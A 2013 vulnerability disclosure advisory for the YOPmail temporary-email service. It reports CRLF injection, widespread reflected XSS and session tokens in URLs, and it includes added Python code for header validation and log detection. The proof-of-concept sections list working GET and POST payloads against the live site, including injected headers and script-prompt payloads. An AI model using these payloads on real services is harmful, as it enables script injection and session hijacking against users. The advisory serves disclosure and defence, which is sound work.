YOPMAIL (Anonymous & Free email address) CRLF Injection / HTTP Response Splitting / XSS / Session Token in URL
==================================================================================================================================================


Report-Timeline:
================
2013-06-01:     Researcher Notification 
2013-06-03:     RESPONSE
2013-06-07:     Ask About the issues
2013-06-10:     Vendor Feedback
2013-06-13:     Not Fixed
2013-06-16:     Ask About the Issues
2013-06-27:     Not Fixed / No Response
2013-06-28:     Full Disclosure


I-VULNERABILITIES
======================

#Title: YOPMAIL (Anonymous & Free email address) CRLF Injection / HTTP Response Splitting / XSS / Session Token in URL

#Vendor: http://www.yopmail.com

#Author: Juan Carlos García (@secnight)

#Follow me:
 http://www.highsec.es
 http://hackingmadrid.blogspot.com
 Twitter: @secnight


II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. Messages are kept for 8 days.
It is possible to send a message to another YOPmail address. No registration is required. Firefox, Internet Explorer 7 and Opera add-ons are downloadable. There are alternate domains.

Domains

@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net
The site has new domains every three months.


III-PROOF OF CONCEPT
======================

CRLF INJECTION - HTTP RESPONSE SPLITTING
______________________________________

The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Attackers actively exploit this web application vulnerability to perform a large variety of attacks, including cross-site scripting (XSS), cross-user defacement, poisoning of the client's web cache, hijacking of web pages, defacement and a myriad of other related attacks. The requests below place an encoded CR LF (%0d%0a) followed by a header name and value in the cfg parameter of cr.php; a response that reflects the parameter without stripping those characters emits the remainder as an additional header line.

Attacks
-------

http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717
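As an added illustration (not part of the original advisory), the Python below shows the server-side check a defender wants wherever cr.php copies cfg into a response header, namely refusing any value that contains CR or LF, together with a small access-log check for the encoded %0d%0a in query strings. SAMPLE_URL and LOG_LINES are constructed from the PoC shape above, and the X-Cfg header name is a placeholder because the advisory does not show which header cfg lands in.

```python
import re
from urllib.parse import urlsplit, parse_qs

ENCODED_CRLF = re.compile(r"%0[dDaA]")  # URL-encoded CR (%0d) or LF (%0a)

# Constructed sample with the cfg payload shape reported above (not captured traffic).
SAMPLE_URL = ("http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader"
              "%3ainjected_by_secnight&r=524")
# Constructed access-log lines; client addresses are RFC 5737 documentation ranges.
LOG_LINES = [
    '203.0.113.5 - - [28/Jun/2013:10:00:01 +0200] "GET /cr.php?cfg=%0d%0a%20SomeCustom'
    'InjectedHeader%3ainjected_by_secnight&r=524 HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Jun/2013:10:00:02 +0200] "GET /cr.php?cfg=0&r=17 HTTP/1.1" 200 312 "-" "-"',
]

def cfg_from_url(url: str) -> str:
    """Decode the cfg parameter the way the server-side script receives it."""
    return parse_qs(urlsplit(url).query).get("cfg", [""])[0]

def header_value_is_safe(value: str) -> bool:
    """Header field values may not contain CR, LF, DEL or other C0 controls (HTAB excepted)."""
    return all(ch == "\t" or (ord(ch) >= 0x20 and ord(ch) != 0x7f) for ch in value)

def build_response_headers(cfg: str) -> list:
    """Hardened 'copy a query parameter into a response header': refuse the value rather
    than let an embedded CR LF end the header line and start an injected one."""
    if not header_value_is_safe(cfg):
        raise ValueError("control characters in header value")
    return [("Content-Type", "text/html; charset=utf-8"), ("X-Cfg", cfg)]  # X-Cfg: placeholder

def rejects(cfg: str) -> bool:
    try:
        build_response_headers(cfg)
    except ValueError:
        return True
    return False

def find_crlf_attempts(log_lines) -> list:
    """Flag log entries whose query string carries an encoded CR or LF; returns (path, parameter)."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        parts = urlsplit(m.group(1))  # raw request target, still percent-encoded
        for pair in parts.query.split("&"):
            if ENCODED_CRLF.search(pair):
                hits.append((parts.path, pair.split("=", 1)[0]))
    return hits
```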


Multiple CROSS SITE SCRIPTING
_______________________________

The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which is executed every time the page is loaded, or whenever an associated event is performed.

Attacks
--------

Below I expose a few of the vulnerabilities, because there are many failures of this type in this web service... So much XSS.

Affected items
--------------
/add-domain.php 
/alternate-domains.php 
/alternate-email-address.php 
/conditions.php 
/contact.php 
/definitions/email-jetable.php 
/definitions/mail-anonyme.php 
/definitions/spam.php 
/donation.php 
/email-anonyme.php 
/email-generator.php 
/en 
/en/add-domain.php 
/en/alternate-domains.php 
/en/alternate-email-address.php 
/en/conditions.php 
/en/contact.php 
/en/definitions 
/en/definitions/email-jetable.php 
/en/definitions/mail-anonyme.php 
/en/definitions/spam.php 
/en/donation.php 
/en/email-anonyme.php 
/en/email-generator.php 
/en/faq.php 
/en/images 
/en/index.php 
/en/plugins.php 
/en/privacy.php 
/en/send-mail.php 
/en/style 
/en/style/pic 
/en/yopmail-chat.php 
/es 
/es/add-domain.php 
/es/alternate-domains.php 
/es/alternate-email-address.php 
/es/conditions.php 
/es/contact.php 
/es/definitions 
/es/definitions/email-jetable.php 
/es/definitions/mail-anonyme.php 
/es/definitions/spam.php 
/es/donation.php 
/es/email-anonyme.php 
/es/email-generator.php 
/es/faq.php 
/es/images 
/es/index.php 
/es/plugins.php 
/es/privacy.php 
/es/send-mail.php 
/es/style 
/es/style/pic 
/es/yopmail-chat.php 
/faq.php 
/fr 
/fr/add-domain.php 
/fr/alternate-domains.php 
/fr/alternate-email-address.php 
/fr/conditions.php 
/fr/contact.php 
/fr/definitions 
/fr/definitions/email-jetable.php 
/fr/definitions/mail-anonyme.php 
/fr/definitions/spam.php 
/fr/donation.php 
/fr/email-anonyme.php 
/fr/email-generator.php 
/fr/faq.php 
/fr/images 
/fr/index.php 
/fr/plugins.php 
/fr/privacy.php 
/fr/send-mail.php 
/fr/style 
/fr/style/pic 
/fr/yopmail-chat.php 
/index.php 
/it 
/it/add-domain.php 
/it/alternate-domains.php 
/it/alternate-email-address.php 
/it/conditions.php 
/it/contact.php 
/it/definitions 
/it/definitions/email-jetable.php 
/it/definitions/mail-anonyme.php 
/it/definitions/spam.php 
/it/donation.php 
/it/email-anonyme.php 
/it/email-generator.php 
/it/faq.php 
/it/images 
/it/index.php 
/it/plugins.php 
/it/privacy.php 
/it/send-mail.php 
/it/style 
/it/style/pic 
/it/yopmail-chat.php 
/pl 
/pl/add-domain.php 
/pl/alternate-domains.php 
/pl/alternate-email-address.php 
/pl/conditions.php 
/pl/contact.php 
/pl/definitions 
/pl/definitions/email-jetable.php 
/pl/definitions/mail-anonyme.php 
/pl/definitions/spam.php 
/pl/donation.php 
/pl/email-anonyme.php 
/pl/email-generator.php 
/pl/faq.php 
/pl/images 
/pl/index.php 
/pl/plugins.php 
/pl/privacy.php 
/pl/send-mail.php 
/pl/style 
/pl/style/pic 
/pl/yopmail-chat.php 
/plugins.php 
/privacy.php 
/ru 
/ru/add-domain.php 
/ru/alternate-domains.php 
/ru/alternate-email-address.php 
/ru/conditions.php 
/ru/contact.php 
/ru/definitions 
/ru/definitions/email-jetable.php 
/ru/definitions/mail-anonyme.php 
/ru/definitions/spam.php 
/ru/donation.php 
/ru/email-anonyme.php 
/ru/email-generator.php 
/ru/faq.php 
/ru/images 
/ru/index.php 
/ru/plugins.php 
/ru/privacy.php 
/ru/send-mail.php 
/ru/style 
/ru/style/pic 
/ru/yopmail-chat.php 
/send-mail.php 
/uk 
/uk/add-domain.php 
/uk/alternate-domains.php 
/uk/alternate-email-address.php 
/uk/conditions.php 
/uk/contact.php 
/uk/definitions 
/uk/definitions/email-jetable.php 
/uk/definitions/mail-anonyme.php 
/uk/definitions/spam.php 
/uk/donation.php 
/uk/email-anonyme.php 
/uk/email-generator.php 
/uk/faq.php 
/uk/images 
/uk/index.php 
/uk/plugins.php 
/uk/privacy.php 
/uk/send-mail.php 
/uk/style 
/uk/style/pic 
/uk/yopmail-chat.php 
/yopmail-chat.php 
/zh 
/zh/add-domain.php 
/zh/alternate-domains.php 
/zh/alternate-email-address.php 
/zh/conditions.php 
/zh/contact.php 
/zh/definitions 
/zh/definitions/email-jetable.php 
/zh/definitions/mail-anonyme.php 
/zh/definitions/spam.php 
/zh/donation.php 
/zh/email-anonyme.php 
/zh/email-generator.php 
/zh/faq.php 
/zh/images 
/zh/index.php 
/zh/plugins.php 
/zh/privacy.php 
/zh/send-mail.php 
/zh/style 
/zh/style/pic 
/zh/yopmail-chat.php 

Method GET
----------

http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec

http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec

http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid

http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E

http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E

http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E

http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E

http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E

http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E

Method POST
------------

http://www.yopmail.com:80/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt%28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst

http://www.yopmail.com:80/zh/send-mail.php

Request Data

act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


SESSION TOKEN IN URL
____________________

This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL. URLs could be logged or leaked via the Referer header.

Affected items
--------------

/cr.php (78a3a31e275b316f36665b35eb4bfe21) 
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1) 
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3) 
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca) 
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604) 

Examples

Method GET
----------

http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&

http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Method POST
-----------

/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst


/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6

Request Data

act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
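Added example, not part of the original advisory: a Python scan of web server access logs for the two exposures described in this section, a PHPSESSID carried in the request URL and one leaking to another page through the Referer header, plus a redaction helper for storing such URLs. The log lines, client addresses and the session parameter names other than PHPSESSID are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Query parameter names treated as session identifiers. PHPSESSID is the one reported
# above; the other names are assumed common defaults on other stacks.
SESSION_PARAMS = {"phpsessid", "sid", "sessionid", "jsessionid"}

# Combined log format: client, method, URL, referer, user agent.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" \d+ \S+ "([^"]*)" "([^"]*)"')

# Constructed log lines (RFC 5737 documentation addresses, sample token); not captured traffic.
LOG_LINES = [
    '203.0.113.5 - - [28/Jun/2013:10:00:01 +0200] "GET /es/email-anonyme.php'
    '?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Jun/2013:10:00:02 +0200] "GET /en/faq.php HTTP/1.1" 200 1024 '
    '"http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Jun/2013:10:00:03 +0200] "GET /en/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def session_tokens_in_url(url: str) -> list:
    """Return (parameter, value) pairs in the query string that look like session ids."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [(k, v) for k, v in pairs if k.lower() in SESSION_PARAMS]

def redact_url(url: str) -> str:
    """Replace session id values so the URL can be kept in logs or tickets safely."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    clean = [(k, "REDACTED" if k.lower() in SESSION_PARAMS else v) for k, v in pairs]
    return urlunsplit(parts._replace(query=urlencode(clean)))

def scan_log(lines) -> list:
    """Flag requests that carry a session id in the URL itself or leak one via Referer."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, url, referer, _ua = m.groups()
        for where, target in (("request", url), ("referer", referer)):
            for param, _value in session_tokens_in_url(target):
                findings.append({"client": client, "where": where, "param": param,
                                 "url": redact_url(target)})
    return findings
```

Detection only shows the exposure; on PHP the root cause is removed by setting session.use_only_cookies = 1 and session.use_trans_sid = 0, so an id in the query string is neither accepted nor appended to links.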



IV. CREDITS
-------------------------

These vulnerabilities have been discovered
by Juan Carlos García (@secnight)


V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.